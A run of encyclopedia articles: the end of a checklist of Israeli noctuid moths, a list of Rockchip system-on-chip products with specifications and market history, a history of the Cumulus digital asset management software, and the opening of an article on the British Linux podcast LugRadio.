Bang-Haas, 1912 Tyta luctuosa [Denis & Schiffermüller, 1775] Epharmottomena eremophila (Rebel, 1895) Iranada turcorum (Zerny, 1915) Subfamily Noctuinae Euxoa anarmodia (Staudinger, 1897) Euxoa aquilina (Denis & Schiffermüller, 1775) Euxoa cos (Hübner, [1824]) Euxoa canariensis (Rebel, 1902) Euxoa conspicua (Hübner, [1827]) Euxoa distinguenda (Lederer, 1857) Euxoa foeda (Lederer, 1855) Euxoa heringi (Staudinger, 1877) Euxoa nigrofusca (Esper, [1788]) Euxoa oranaria (Bang-Haas, 1906) Euxoa robiginosa (Staudinger, 1895) Euxoa temera (Hübner, [1808]) Agrotis spinifera (Hübner, [1808]) Agrotis segetum ([Denis & Schiffermüller], 1775) Agrotis trux (Hübner, [1824]) Agrotis exclamationis (Linnaeus, 1758) Agrotis scruposa (Draudt, 1936) Agrotis alexandriensis Bethune-Baker, 1894 Agrotis herzogi Rebel, 1911 Agrotis haifae Staudinger, 1897 Agrotis sardzeana Brandt, 1941 Agrotis ipsilon (Hüfnagel, 1766) Agrotis puta (Hübner, [1803]) Agrotis syricola Corti & Draudt, 1933 Agrotis bigramma (Esper, [1790]) Agrotis obesa (Boisduval, 1829) Agrotis pierreti (Bugnion, 1837) Agrotis psammocharis Boursin, 1950 Agrotis lasserrei (Oberthür, 1881) Agrotis boetica (Boisduval, [1837]) Agrotis margelanoides (Boursin, 1944) Pachyagrotis tischendorfi (Püngeler, 1925) Dichagyris rubidior (Corti, 1933) Dichagyris terminicincta (Corti, 1933) Dichagyris candelisequa ([Denis & Schiffermüller], 1775) Dichagyris elbursica (Draudt, 1937) Dichagyris leucomelas Brandt, 1941 Dichagyris melanuroides Kozhantshikov, 1930 Dichagyris melanura (Kollar, 1846) Dichagyris imperator (Bang-Haas, 1912) Dichagyris pfeifferi (Corti & Draudt, 1933) Dichagyris singularis (Staudinger, 1892) Dichagyris erubescens (Staudinger, 1892) Dichagyris devota (Christoph, 1884) Dichagyris amoena Staudinger, 1892 Dichagyris anastasia (Draudt, 1936) Yigoga romanovi (Christoph, 1885) Yigoga flavina (Herrich-Schäffer, 1852) Yigoga nigrescens (Höfner, 1887) Yigoga libanicola (Corti & Draudt, 1933) Yigoga truculenta Lederer, 1853 Stenosomides sureyae facunda (Draudt, 1938) Standfussiana defessa (Lederer, 1858) Rhyacia arenacea (Hampson, 1907) Chersotis ebertorum Koçak, 1980 Chersotis elegans (Eversmann, 1837) Chersotis multangula (Hübner, [1803]) Chersotis capnistis (Lederer, 1872) Chersotis margaritacea (Villers, 1789) Chersotis fimbriola (Esper, [1803]) Chersotis laeta (Rebel, 1904) Ochropleura leucogaster (Freyer, 1831) Basistriga flammatra (Denis & Schiffermüller], 1775) Noctua orbona (Hufnagel, 1766) Noctua pronuba (Linnaeus, 1758) Noctua comes Hübner, [1813] Noctua janthina ([Denis & Schiffermüller], 1775) Noctua tertia Mentzer, Moberg & Fibiger, 1991 Noctua tirrenica (Biebinger, Speidel & Hanigk, 1983) Noctua interjecta Hübner, [1803] Epilecta linogrisea ([Denis & Schiffermüller], 1775) Peridroma saucia (Hübner, [1808]) Eugnorisma pontica (Staudinger, 1892) Xestia sareptana (Herrich-Schäffer, 1851) Xestia castanea (Esper, [1798]) Xestia cohaesa (Herrich-Schäffer, [1849]) Xestia xanthographa ([Denis & Schiffermüller], 1775) Xestia palaestinensis (Kalchberg, 1897) Subfamily Phytometrinae Raparna conicephala (Staudinger, 1870) Antarchaea erubescens (A. 
Bang-Haas, 1910) Subfamily Plusiinae Abrostola clarissa (Staudinger, 1900) Agrapha accentifera (Lefebvre, 1827) Autographa gamma (Linnaeus, 1758) Chrysodeixis chalcites (Esper, [1789]) Cornutiplusia circumflexa (Linnaeus, 1767) Euchalcia augusta (Staudinger, 1891) Euchalcia emichi (Rogenhofer, 1873) Euchalcia aureolineata Ronkay & Gyulai, 1997 Euchalcia augusta (Staudinger, 1891) Euchalcia maria (Staudinger, 1892) Euchalcia olga Kravchenko, Müller, Fibiger & Ronkay, 2006 Euchalcia paulina (Staudinger, 1892) Macdunnoughia confusa (Stephens, 1850) Trichoplusia vittata (Wallengren, 1856) Thysanoplusia daubei (Boisduval, 1840) Thysanoplusia orichalcea (Fabricius, 1775) Trichoplusia ni (Hübner, [1803]) Trichoplusia circumscripta (Freyer, 1831) Subfamily Psaphidinae Valeria oleagina (Denis and & Schiffermüller, 1775) Valeria josefmooseri Kravchenko, Speidel & Muller, 2006 Valeria thomaswitti Kravchenko, Muller & Speidel 2006 Allophyes benedictina (Staudinger, 1892) Allophyes asiatica (Staudinger, 1892) Subfamily Rivulinae Rivula tanitalis Rebel, 1912 Zebeeba falsalis (Herrich-Schäffer, 1839) Subfamily Xyleninae Spodoptera exigua (Hübner, 1808) Spodoptera cilium (Guenée, 1852) Spodoptera littoralis (Boisduval, 1833) Caradrina agrotina (Staudinger, 1892) Caradrina aspersa (Rambur, 1834) Caradrina kadenii (Freyer, 1836) Caradrina syriaca (Staudinger, 1892) Caradrina panurgia (Boursin, 1939) Caradrina oberthueri (Rothschild, 1913) Caradrina ingrata (Staudinger, 1897) Caradrina flavirena (Guenée, 1852) Caradrina scotoptera (Püngeler, 1914) Caradrina hypostigma (Boursin, 1932) Caradrina amseli (Boursin, 1936) Caradrina clavipalpis (Scopoli, 1763) Caradrina selini Boisduval, 1840 Caradrina levantina Hacker, 2004 Caradrina zandi (Wiltshire, 1952) Caradrina fibigeri Hacker, 2004 Caradrina atriluna (Guenée, 1852) Caradrina zernyi (Boursin, 1936) Caradrina flava (Oberthür, 1876) Caradrina casearia (Staudinger, 1900) Caradrina kravchenkoi Hacker, 2004 Caradrina vicina (Staudinger, 1870) Caradrina alfierii (Boursin, 1937) Caradrina melanurina (Staudinger, 1901) Caradrina bodenheimeri (Draudt, 1934) Hoplodrina ambigua [Denis & Schiffermüller, 1775] Scythocentropus eberti Hacker, 2001 Scythocentropus inquinata (Mabille, 1888) Diadochia stigmatica Wiltshire, 1984 Heterographa puengeleri Bartel, 1904 Catamecia minima (C. Swinhoe, 1889) Dicycla oo (Linnaeus, 1758) Atethmia ambusta [Denis & Schiffermüller, 1775] Atethmia centrago (Haworth, 1809) Eremotrachea bacheri (Püngeler, 1902) Anthracia eriopoda (Herrich-Schäffer, 1851) Mormo maura (Linnaeus, 1758) Polyphaenis propinqua (Staudinger, 1898) Olivenebula subsericata Herrich-Schäffer, 1861 Chloantha hyperici [Denis & Schiffermüller, 1775] Phlogophora meticulosa (Linnaeus, 1758) Pseudenargia regina (Staudinger, 1892) Pseudenargia deleta (Osthelder, 1933) Apamea monoglypha (Hufnagel, 1766) Apamea syriaca (Osthelder, 1933) Apamea polyglypha (Staudinger, 1892) Apamea leucodon (Eversmann, 1837) Apamea platinea (Herrich-Schäffer, 1852) Apamea anceps [Denis & Schiffermüller, 1775] Mesoligia literosa (Haworth, 1809) Luperina dumerilii (Duponchel, 1826) Luperina kravchenkoi Fibiger & Müller, 2005 Luperina rjabovi (Kljutschko, 1967) Margelana flavidior F. 
Wagner, 1931 Gortyna gyulaii Fibiger & Zahiri, 2006 Oria musculosa (Hübner, 1809) Monagria typhae (Thunberg, 1784) Lenisa geminipuncta (Haworth, 1809) Lenisa wiltshirei (Bytinski-Salz, 1936) Arenostola deserticola (Staudinger, 1900) Sesamia ilonae Hacker, 2001 Sesamia cretica Lederer, 1857 Sesamia nonagrioides (Lefèbvre, 1827) Episema tamardayanae Fibiger, Kravchenko, Mooser, Li & Müller, 2006 Episema lederi Christoph, 1885 Episema didymogramma (Boursin, 1955) Episema ulriki Fibiger, Kravchenko & Müller, 2006 Episema korsakovi (Christoph, 1885) Episema lemoniopsis Hacker, 2001 Leucochlaena muscosa (Staudinger, 1892) Leucochlaena jordana Draudt, 1934 Ulochlaena hirta (Hübner, 1813) Ulochlaena gemmifera Hacker 2001 Eremopola lenis (Staudinger, 1892) Tiliacea cypreago (Hampson, 1906) Xanthia pontica Kljutshko, 1968 Maraschia grisescens Osthelder, 1933 Agrochola litura (Linnaeus, 1761) Agrochola rupicarpa (Staudinger, 1879) Agrochola osthelderi Boursin, 1951 Agrochola macilenta (Hübner, 1809) Agrochola helvola (Linnaeus, 1758) Agrochola pauli (Staudinger, 1892) Agrochola scabra (Staudinger, 1892) Agrochola hypotaenia (Bytinsky-Salz, 1936) Agrochola lychnidis [Denis & Schiffermüller, 1775] Agrochola staudingeri Ronkay, 1984 Conistra acutula (Staudinger, 1892) Conistra veronicae (Hübner, 1813) Jodia croceago [Denis & Schiffermüller, 1775] Lithophane semibrunnea (Haworth, 1809) Lithophane lapidea (Hübner, 1808) Lithophane ledereri (Staudinger, 1892) Xylena exsoleta (Linnaeus, 1758) Xylena vetusta (Hübner, 1813) Evisa schawerdae Reisser, 1930 Rileyiana fovea (Treitschke, 1825) Dryobota labecula (Esper, 1788) Scotochrosta pulla [Denis & Schiffermüller, 1775] Dichonia pinkeri (Kobes, 1973) Dichonia aeruginea (Hübner, 1808) Dryobotodes eremita (Fabricius, 1775) Dryobotodes carbonis (F. Wagner, 1931) Dryobotodes tenebrosa (Esper, 1789) Pseudohadena eibinevoi Fibiger, Kravchenko & Muller, 2006 Pseudohadena jordana (Staudinger, 1900) Pseudohadena commoda (Staudinger, 1889) Antitype jonis (Lederer, 1865) Ammoconia senex (Geyer, 1828) Aporophyla canescens (Duponchel, 1826) Aporophyla nigra (Haworth, 1809) Aporophyla australis (Boisduval, 1829) Aporophyla dipsalea Wiltshire, 1941 Dasypolia ferdinandi Rühl, 1892 Polymixis manisadjiani (Staudinger, 1882) Polymixis subvenusta (Püngeler, 1906) Polymixis juditha (Staudinger, 1898) Polymixis rebecca (Staudinger, 1892) Polymixis steinhardti Kravchenko, Fibiger, Mooser & Müller, 2005 Polymixis ancepsoides Poole, 1989 Polymixis rufocincta (Geyer, 1828) Polymixis trisignata (Ménétriès, 1847) Polymixis serpentina (Treitschke, 1825) Polymixis apora (Staudinger, 1898) Polymixis lea (Staudinger, 1898) Polymixis aegyptiaca (Wiltshire, 1947) Polymixis epiphleps (Turati & Krüger, 1936) Mniotype compitalis (Draudt, 1909) Mniotype judaica (Staudinger, 1898) Mniotype johanna (Staudinger, 1898) Boursinia discordans (Boursin, 1940) Boursinia deceptrix (Staudinger, 1900) Boursinia lithoxylea (A. Bang-Haas, 1912) Wiltshireola praecipua Hacker & Kravchenko, 2001 Ostheldera gracilis (Osthelder, 1933) Metopoplus excelsa (Christoph, 1885) See also Noctuidae Moths Lepidoptera List of moths of Israel External links The Acronictinae, Bryophilinae, Hypenodinae and Hypeninae of Israel The Noctuinae of Israel The Plusinae of Israel Heliothinae of Israel Hadeninae of Israel Images Images, genus Catocala in Israel Eublemminae of Israel Checklist of Noctuidae of Israel Noctuidae
60580512
https://en.wikipedia.org/wiki/List%20of%20Rockchip%20products
List of Rockchip products
This is a list of Rockchip products. Products Featured products RK3399 The RK3399 is Rockchip's flagship SoC, with two Cortex-A72 and four Cortex-A53 CPU cores and a Mali-T860MP4 GPU, providing high computing and multimedia performance together with rich interfaces and peripherals. Its software supports multiple APIs, including OpenGL ES 3.2, Vulkan 1.0, OpenCL 1.1/1.2 and OpenVX 1.0, and its AI interfaces support TensorFlow Lite and the Android NN API. RK3399 Linux source code and hardware documents are available on GitHub and the Rockchip open-source wiki. RK3288 The RK3288 is a high-performance IoT platform with a quad-core Cortex-A17 CPU and Mali-T760MP4 GPU, 4K video decoding and 4K display output. It is used in products across various industries, including vending machines, commercial displays, medical equipment, gaming, intelligent POS, interactive printers, robots and industrial computers. RK3288 Linux source code and hardware documents are available on GitHub and the Rockchip open-source wiki. RK3326 & PX30 The RK3326 and PX30, announced in 2018, are designed for smart AI solutions. The PX30 is a variant of the RK3326 targeting the IoT market and supporting dual VOP. Both use Arm's newer-generation Cortex-A35 CPU and Mali-G31 GPU. The RK3326 is widely used in handheld consoles designed for emulation. RK3308 The RK3308 is another chipset targeting smart AI solutions. It is an entry-level chipset aimed at mainstream devices. The chip has multiple audio input interfaces and greater energy efficiency, and features an embedded VAD (voice activity detection) unit. RV1108 The announcement of the RV1108 marked Rockchip's move into AI and computer vision. With an embedded CEVA DSP, the RV1108 powers smart cameras including 360° video cameras, IP cameras, drones, car camcorders, sports DVs and VR devices. It has also been deployed in new retail and intelligent marketing applications with integrated algorithms. RK1808 The RK1808 is Rockchip's first chip with a Neural Processing Unit (NPU) for artificial intelligence applications. The RK1808 specifications include: Dual-core ARM Cortex-A35 CPU Neural Processing Unit (NPU) with up to 3.0 TOPS supporting INT8/INT16/FP16 hybrid operation 22 nm FD-SOI process VPU supporting 1080p video codec Built-in 2 MB system-level SRAM RK3530 The RK3530 is a SoC targeting the set-top box market, scheduled to ship in Q3 2019. The RK3530 specifications include: 4x Cortex-A55 DynamIQ CPU Mali-G52 GPU 14 nm LPP process RV1109 The RV1109 is a vision processor SoC scheduled to ship in Q4 2019. The RV1109 specifications include: 14 nm LPP process NPU 2.0 ISP 2.0 VPU 2.0 capable of 4K H.264/H.265 RK3588 The RK3588 is a high-end SoC scheduled to ship in Q1 2020. The RK3588 specifications include: 4x Cortex-A76 and 4x Cortex-A55 DynamIQ CPU NPU 2.0 8 nm LPP process VPU 2.0 supporting 8K video Built-in 2 MB system-level SRAM Early products RK26xx series - Released 2006. RK27xx series - Rockchip was first known for its RK27xx series, which was very efficient at MP3/MP4 decoding and was integrated into many low-cost personal media player (PMP) products. RK28xx series The RK2806 was targeted at PMPs. The RK2808A is an ARM926EJ-S derivative. Along with the ARM core, a DSP coprocessor is included. The native clock speed is 560 MHz. ARM rates the performance of the ARM926EJ-S at 1.1 DMIPS/MHz; the performance of the Rockchip RK2808 when executing ARM instructions is therefore about 660 DMIPS, roughly 26% of the speed of Apple's A4 processor. The DSP coprocessor can support the real-time decoding of 720p video files at bitrates of up to 2.5 Mbit/s. This chip was the core of many Android and Windows Mobile-based mobile internet devices. 
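The DMIPS figure quoted above comes from multiplying ARM's per-MHz rating by a clock frequency. The following is a minimal Python sketch of that arithmetic; the exact result simply scales with whichever clock frequency is assumed, which is why published figures for the same core can differ.

```python
def dmips(rating_dmips_per_mhz: float, clock_mhz: float) -> float:
    """Estimate total DMIPS from a per-MHz rating and a clock frequency."""
    return rating_dmips_per_mhz * clock_mhz

# ARM rates the ARM926EJ-S at 1.1 DMIPS/MHz; the result depends on the clock.
for clock in (560, 600):
    print(f"{clock} MHz -> {dmips(1.1, clock):.0f} DMIPS")
```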
The RK2816 was targeted at PMP devices and MIDs. It has the same specifications as the RK2806 but also includes HDMI output, Android support, and up to 720p hardware video acceleration. RK29xx series The Rockchip RK291x is a family of SoCs based on the ARM Cortex-A8 CPU core. They were presented for the first time at CES 2011. The RK292x are single-core SoCs based on the ARM Cortex-A9 and were first introduced in 2012. The RK2918 was the first chip to decode Google WebM VP8 in hardware. It uses a dynamically configurable companion core to process various codecs. It encodes and decodes H.264 at 1080p, and can decode many standard video formats including Xvid, H.263, AVS, MPEG4, RV, and WMV. It includes a Vivante GC800 GPU that is compatible with OpenGL ES 2.0 and OpenVG. The RK2918 is compatible with Android Froyo (2.2), Gingerbread (2.3), HoneyComb (3.x) and Ice Cream Sandwich (4.0). Unofficial support for Ubuntu and other Linux flavours exists. As of 2013, it was targeted at E-readers. The RK2906 is basically a cost-reduced version of the RK2918, also targeted at E-readers as of 2013. The Rockchip RK2926 and RK2928 each feature a single-core ARM Cortex-A9 running at up to 1.0 GHz. They replace the Vivante GC800 GPU of the older RK291x series with an ARM Mali-400 GPU. As of 2013, the RK2926 was targeted at tablets, while the RK2928 was targeted at tablets and Android TV dongles and boxes. RK30xx series The RK3066 is a high-performance dual-core ARM Cortex-A9 mobile processor similar to the Samsung Exynos 4 Dual Core chip. In terms of performance, the RK3066 is between the Samsung Exynos 4210 and the Samsung Exynos 4212. As of 2013, it was targeted at tablets and Android TV dongles and boxes. It has been a popular choice for both tablets and other devices since 2012. The RK3068 is a version of the RK3066 specifically targeted at Android TV dongles and boxes. Its package is much smaller than the RK3066. The RK3028 is a low-cost dual-core ARM Cortex-A9-based processor clocked at 1.0 GHz with an ARM Mali-400 GPU. It is pin-compatible with the RK2928. It is used in a few kids' tablets and low-cost Android HDMI TV dongles. The RK3026 is an updated ultra-low-end dual-core ARM Cortex-A9-based tablet processor clocked at 1.0 GHz with an ARM Mali-400 MP2 GPU. Manufactured at 40 nm, it is pin-compatible with the RK2926. It features 1080p H.264 video encoding and 1080p decoding in multiple formats. Supporting Android 4.4, it was adopted for low-end tablets in 2014. The RK3036 is a low-cost dual-core ARM Cortex-A7-based processor released in Q4 2014 for smart set-top boxes with support for H.265 video decoding. RK31xx series The RK3188 was the first product in the RK31xx series, announced for production in the second quarter of 2013. The RK3188 features a quad-core ARM Cortex-A9 clocked at up to 1.6 GHz. It is targeted at tablets and Android TV dongles and boxes, and has been a popular choice for both tablets and other devices requiring good performance. 28 nm HKMG process at GlobalFoundries Quad-core ARM Cortex-A9, up to 1.6 GHz 512 KB L2 cache Mali-400 MP4 GPU, up to 600 MHz (typically 533 MHz) supporting OpenGL ES 1.1/2.0, OpenVG 1.1 High performance dedicated 2D processor DDR3, DDR3L, LPDDR2 support Dual-panel display up to 2048x1536 resolution The RK3188T is a lower-clocked version of the RK3188, with the CPU cores running at a maximum speed of 1.4 GHz instead of 1.6 GHz. The Mali-400 MP4 GPU is also clocked at a lower speed. 
As of early 2014, many devices advertised as using a RK3188 with a maximum clock speed of 1.6 GHz actually have a RK3188T with clock speed limited to 1.4 GHz. Operating system ROMs specifically made for the RK3188 may not work correctly with a RK3188T. The RK3168, first shown in April 2013, is a dual-core Cortex A9-based CPU, also manufactured using the 28 nm process. It is targeted at low-end tablets. The chip has seen only limited use as of May 2014. The RK3126 is an entry-level tablet processor introduced in Q4 2014. Manufactured using a 40 nm process, it features a quad-core Cortex-A7 CPU up to 1.3 GHz and a Mali-400 MP2 GPU. It is pin-compatible with RK3026 and RK2926. 40 nm process Quad-core ARM Cortex-A7, up to 1.3 GHz Mali-400 MP2 GPU High performance dedicated 2D processor DDR3, DDR3L memory interface 1080p multi-format video decoding and 1080p video encoding for H.264 The RK3128 is a higher-end variant of RK3126, also to be introduced in Q4 2014, that features more integrated external interfaces, including CVBS, HDMI, Ethernet MAC, S/PDIF, Audio DAC, and USB. It targets more fully featured tablets and set-top boxes. RK32xx series Rockchip has announced the RK3288 for production in the second quarter of 2014. Recent information suggests that the chip uses a quad-core ARM Cortex-A17 CPU, although technically ARM Cortex-A12, which as of October 1, 2014, ARM has decided to also refer to as Cortex-A17 because the latest production version of Cortex-A12 performs at a similar performance level as Cortex-A17. 28 nm HKMG process. Quad-core ARM Cortex-A17, up to 1.8 GHz Quad-core ARM Mali-T760 MP4 (also incorrectly called Mali-T764) GPU clocked at 600 MHz supporting OpenGL ES 1.1/2.0/3.0/3.1, OpenCL 1.1, Renderscript, Direct3D 11.1 High performance dedicated 2D processor 1080P video encoding for H.264 and VP8, MVC 4K H.264 and 10 bits H.265 video decode, 1080p multi-video decode Supports 4Kx2K H.265 resolution Dual-channel DDR3, DDR3L, LPDDR2, LPDDR3 Up to 3840x2160 display output, HDMI 2.0 Inconsistent information about CPU cores used in RK3288 Early reports including Rockchip first suggested in summer 2013 that the RK3288 was originally designed using a quad-core ARM Cortex-A12 configuration. Rockchip's primary foundry partner GlobalFoundries announced a partnership with ARM to optimize the ARM Cortex-A12 for their 28 nm-SLP process. This is the same process used for earlier Rockchip chips such as the RK3188, and matches the choice of Cortex-A12 cores in the design of the RK3288. In January 2014, official marketing materials listed the CPU cores as ARM Cortex-A17. At the CES electronics show in January 2014, someone apparently corrected the CPU specification as being ARM Cortex-A12 instead of Cortex-A17 on one of the panels of their show booth. However, since then, official specifications from Rockchip's website and marketing materials as well specifications used by device manufacturers have continued to describe the CPU as a quad-core ARM Cortex-A17. Recent testing of early RK3288-based TV boxes (August/September 2014) provided evidence that the RK3288 technically contains Cortex-A12 cores, since the "ARM 0xc0d" CPU architecture reported by CPU-Z for Android is the reference for Cortex-A12, while the original Cortex-A17 is referred to as "ARM 0xc0e". 
However, on the ARM community website, ARM clarified the situation on October 1, 2014, saying that Cortex-A12, for which Rockchip is one of the few known customers, will be called Cortex-A17 from now on, and that all references to Cortex-A12 have been removed from ARM's website. ARM explained that the latest production revision of Cortex-A12 now performs close to the level of Cortex-A17 because the improvements of the Cortex-A17 now also have been applied to the latest version of Cortex-A12. In this way, Rockchip now gets the official blessing from ARM for listing the cores inside the RK3288 as Cortex-A17. The first Android TV stick based on RK3288 was launched in November 2014 ("ZERO Devices Z5C Thinko"). RK33xx series RK3368 Rockchip announced the first member of the RK33xx family at the CES show in January 2015. The RK3368 is a SoC targeting tablets and media boxes featuring a 64-bit octa-core Cortex-A53 CPU and an OpenGL ES 3.1-class GPU. Octa-Core Cortex-A53 64-bit CPU, up to 1.5 GHz PowerVR SGX6110 GPU with support for OpenGL 3.1 and OpenGL ES 3.0 28 nm process 4K UHD H.264/H.265 real-time video playback HDMI 2.0 for 4K@60 Hz with HDCP 1.4/2.2 RK3399 aka OP1 The RK3399 announced by ARM at Mobile World Congress in February 2016, features six 64 bit CPU cores, including 2 Cortex-A72 and 4 Cortex-A53. Dual Cortex-A72 + Quad Cortex-A53 64-bit CPU, up to 1.8 GHz Mali-T860 MP4 (also incorrectly called Mali-T864) GPU with support for OpenGL ES 1.1/2.0/3.0/3.1, OpenVG 1.1, OpenCL, DX11 4K VP9 and 4K 10 bits H.265/H.264 video decoders, up to 60 fps 1080p video encoders for H.264 and VP8 Dual 13 MP ISP and dual channel MIPI CSI-2 receive interface Consumer devices include: Asus Chromebook Flip C101PA-DB02 Asus Chromebook Tablet CT100 Samsung Chromebook Plus PINEBOOK Pro PINEPHONE Pro Open source commitment Rockchip provides open source software on GitHub and maintains a wiki Linux SDK website to offer free downloads of SoC hardware documents and software development resources as well as third-party development kit info. The chipsets available are RK3399, RK3288, RK3328 and RK3036. Markets and competition In the market for SoCs for tablets, Rockchip faces competition with Allwinner Technology, MediaTek, Intel, Actions Semiconductor, Spreadtrum, Leadcore Technology, Samsung Semiconductor, Qualcomm, Broadcom, VIA Technologies, UNISOC and Amlogic. After establishing a position early in the developing Chinese tablet SoC market, in 2012 it faced a challenge by Allwinner. In 2012, Rockchip shipped 10.5 million tablet processors, compared to 27.5 million for Allwinner. However, for Q3 2013, Rockchip was forecast to ship 6 million tablet-use application processors in China, compared to 7 million for Allwinner who mainly shipped single-core products. Rockchip was reported to be the number one supplier of tablet-use application processors in China in Q4 2013, Q1 2014 and Q2 2014. Chinese SoC suppliers that do not have cellular baseband technology are at a disadvantage compared to companies such as MediaTek that also supply the smartphone market as white-box tablet makers increasingly add phone or cellular data functionality to their products. Intel Corporation made investments into the tablet processor market, and was heavily subsidizing its entry into the low-cost tablet market as of 2014. Cooperation with Intel In May 2014, Intel announced an agreement with Rockchip to jointly deliver an Intel-branded mobile SoC platform based on Intel's Atom processor and 3G modem technology. 
Under the terms of the agreement, the two companies will deliver an Intel-branded mobile SoC platform. The quad-core platform will be based on an Intel Atom processor core integrated with Intel's 3G modem technology, and is expected to be available in the first half of 2015. Both Intel and Rockchip will sell the new part to OEMs and ODMs, primarily into each company's existing customer base.

As of October 2014, Rockchip was already offering Intel's XMM 6321 platform for low-end smartphones. It consists of two chips: a dual-core application processor (with either Intel processor cores or ARM Cortex-A5 cores) with an integrated modem (XG632), and an integrated RF chip (AG620) that originates from the cellular chip division of Infineon Technologies, which Intel had previously acquired. The application processor may also originate from Infineon or Intel. Rockchip had not previously targeted the smartphone market in a significant way.

List of Rockchip SoC
ARMv7-A processors
ARMv8-A processors
Tablet processors with integrated modem

References

Rockchip ARM architecture X86 architecture System on a chip
5855366
https://en.wikipedia.org/wiki/Cumulus%20%28software%29
Cumulus (software)
Cumulus is a digital asset management software designed as a client/server system developed by Canto Software. The product line includes editions targeted to smaller organizations and larger enterprises. The product makes use of metadata for indexing, organizing, and searching. Cumulus servers run on macOS, Windows, and Linux systems. Cumulus client software is available for Mac, Windows, web browsers and iOS. History Cumulus was first released as a Macintosh application in 1992, and was named by Apple Computer as the "Most Innovative Product of 1992". Cumulus introduced search capabilities beyond those available in the Macintosh at the time, particularly relating to thumbnails. Cumulus 1.0 was a single-user product with no network capabilities. Among the main features of Cumulus 1.0, the search function automatically generated previews and contained support for the included AppleTalk – Peer-to-Peer – network Cumulus 2.5 was available in five different languages and received the 1993 MacUser magazine Eddy award for "Best Publishing & Graphics Utility". In 1995, Canto introduced the scanner software "Cirrus" to focus on the development of Cumulus. Cumulus 3, released in 1996, introduced a server version for the first time and contained the possibility to spread files over the Internet via the "Web Publisher". Since Apple offered Cumulus 3 with its "Workgroup Server" as a bundle, Cumulus became one of the leading digital asset management systems. Cumulus 4 was the first version that was network-ready, and was available for Macintosh, Windows and UNIX operating systems allowing for cross-platform file sharing. Released in 1998, the support of Solaris was discounted later. Cumulus 5 modified the software core to use an open architecture providing an API to external systems and databases. The open architecture of Cumulus 5 also enabled a more functional bridge between Cumulus and the Internet. Cumulus 6 introduced Embedded Java Plugin (EJaP) which allowed system integrators to build custom Java plug-ins to extend the functionality of the Cumulus client. Cumulus 6.5 marked the end of the Cumulus Single User Edition product, which was licensed to MediaDex for further development and distribution. Cumulus 7 was introduced in the Summer of 2006. Cumulus 8 was released in June 2009, including new indexation technologies and taking advantage of multicore/multiprocessors systems, and able to manage a wider variety of file formats. Cumulus 8.5 was released in May, 2011. Support was added for multilingual metadata, sometimes referred to as "World Metadata." Cumulus Sites was updated to support metadata editing and file uploads. Cumulus 8.6 was released in July 2012, and contains an updated user interface for the administration of Cumulus Sites and additional features for web-based administration of Cumulus. Other additions include features for collaboration links, multi-language support and automated version control. An integration tool – the Canto Integration Platform – that allows integration into existing systems and business processes with other enterprise solutions and web applications was released by Canto in June 2012. Cumulus 9 was released in September 2013 and introduced a new Web Client User Interface and the Cumulus Video Cloud. The Cumulus Web Client UI was redesigned to provide users with a modern, easy-to-use interface to support and guide the user while addressing modern business needs. 
The Cumulus Video Cloud extends Cumulus's video handling capabilities with conversion and global streaming. Cumulus 9 also saw the addition of upload collection links, which allow external collaborators to drag and drop files directly into Cumulus without needing a Cumulus account. Cumulus 9.1 was released in May 2014 and introduced the Adobe Drive Adapter for Cumulus, which allows users to browse and search digital assets in Cumulus directly from Adobe work environments such as Photoshop, InDesign, Illustrator, Premiere and other Adobe applications. Cumulus 10 (Cumulus X) was released in July 2015 and introduced two mobile-friendly products: the Cumulus app and Portals. The Cumulus app runs on iOS and allows users to collaborate on an iPhone or iPad. Portals is the read-only version of the Cumulus Web Client, where users can work with the assets that administrators make available. Cumulus 10.1 was introduced in January 2016 and included the InDesign Client integration, which lets users work with Adobe InDesign while accessing their assets from Cumulus. Cumulus 10.2 was introduced in September 2016 and brought the Media Delivery Cloud, which uses Amazon Web Services. It allows users to manage their media renditions from a single source and distribute media files globally across different channels and devices. Cumulus 10.2.3 was released in February 2017 and added a crop-and-customize photos feature for Portals and the Web Client.

Product Overview
As digital asset management software, Cumulus aims to cover the complete usage cycle of a file. This starts with cataloging the file on upload into the archive, where Cumulus extracts as much information about the file as possible from its metadata. For image or photo files, this is typically Exif and IPTC data. Cumulus also provides ways to import information from other file formats, such as PDF and Microsoft Office documents, and to export data to formats including PowerPoint, QuickTime, QuarkXPress and RedDot. The metadata is mainly used to search the archive. The use of embargo data supports license management for copyrighted material. The managed files can be cataloged and their permitted usage can be set. The indexing is based on a predefined taxonomy, governed by the internal rules of the organization or by industry standards. It is possible to specify whether files may only be used for specific purposes or only by certain groups of people. The system also includes version management to support production work with revised files. Via the publication function, files prepared for distribution can be shared directly via links or e-mail. External access is also possible via the Cumulus Portals web interface, which allows read-only access to released content from the catalog. There are different product variants, ranging from the "Workgroup archive server" up to the "Enterprise Business Server" for large companies. The servers are available for Windows, Linux, macOS (fat binaries) and Solaris, and the clients for Windows and macOS. Both server and client are extensible through a Java-based plug-in architecture. Since version 7.0, there has been a web application based on Ajax with a separate user interface. For access to the Cumulus catalog on mobile devices, an application for Apple devices based on iOS has been available since 2010.

Other
In 2015, Cumulus developer Canto established the first Canto digital asset management (DAM) event. The event is held annually in Berlin.
The Henry Stewart team has been hosting DAM conferences since at least 2006 See also Comparison of image viewers References External links Graphics software Information technology management
8718562
https://en.wikipedia.org/wiki/LugRadio
LugRadio
LugRadio was a British podcast on the topic of Linux and events in the free and open source software communities, as well as coverage of technology, digital rights and politics. The show was launched in 2004 as a result of discussions between several members of the Wolverhampton Linux User Group. After five seasons, on 30 June 2008, LugRadio announced that they would end the show at their convention, LugRadio Live UK 2008. The show was presented by Jono Bacon, Stuart Langridge, Chris Procter and Adam Sweet. Jono Bacon and Stuart Langridge are the only two presenters who were with the show throughout, with Jono Bacon being the only presenter to appear on every show. Previous regular presenters were Matthew Revell (Seasons 1 - 4), Adrian Bradshaw (Seasons 2 - 4) and Stephen Parkes (Season 1, and the first few shows of Season 2). The show has also featured a number of guest presenters. Guests have included Ximian co-founder Nat Friedman, Google Open Source program manager Chris DiBona, Sun Head of Open Source Strategy Simon Phipps and Eric Raymond among others. History LugRadio was conceived by Jono Bacon and Matthew Revell in 2003. The pair met at Wolverhampton Linux User Group and it was agreed that Stuart Langridge and Stephen Parkes would complete the line-up. The first show, called The Phantom Message, was released on 26 February 2004. Most releases of the show were licensed under the Creative Commons Attribution Non-Commercial No-Derivatives licence, but shows released after December 2007 are under the Attribution-Share Alike 3.0 Unported licence. An effort was made to relicense earlier content under the same license where possible. Media coverage and awards LugRadio received coverage in Linux Format magazine, Linux User and Developer magazine and Linux Magazine as well as online coverage by sites such as Slashdot. An episode of LugRadio was included on the cover CD of Linux User and Developer magazine. In 